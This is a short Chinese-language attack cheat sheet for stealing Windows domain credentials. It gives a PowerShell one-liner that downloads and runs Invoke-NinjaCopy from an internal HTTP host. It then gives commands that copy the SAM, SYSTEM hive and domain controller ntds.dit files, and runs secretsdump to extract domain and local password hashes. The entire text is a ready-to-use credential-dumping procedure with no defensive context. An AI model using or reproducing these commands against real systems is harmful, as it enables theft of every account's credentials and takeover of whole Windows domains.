獲取NTDS.dit
加載ps腳本
IEX (New-Object Net.WebClient).DownloadString("http://192.168.1.5/Invoke-NinjaCopy.ps1");
提取本地sam文件
Invoke-NinjaCopy -Path C:\Windows\System32\config\sam -LocalDestination C:\Users\Administrator\Desktop\sam
提取域控NTDS.dit
Invoke-NinjaCopy -Path C:\Windows\NTDS\ntds.dit -LocalDestination C:\Users\Administrator\Desktop\ntds.dit
提取hive文件
Invoke-NinjaCopy -Path C:\Windows\System32\config\SYSTEM -LocalDestination C:\Users\Administrator\Desktop\SYSTEM
提取hash
secretsdump.exe -ntds ntds.dit -system SYSTEM LOCAL #提取域控用戶hash
secretsdump.exe -sam sam -system SYSTEM LOCAL #提取本地用戶hash
運氣好可以直接得到祕密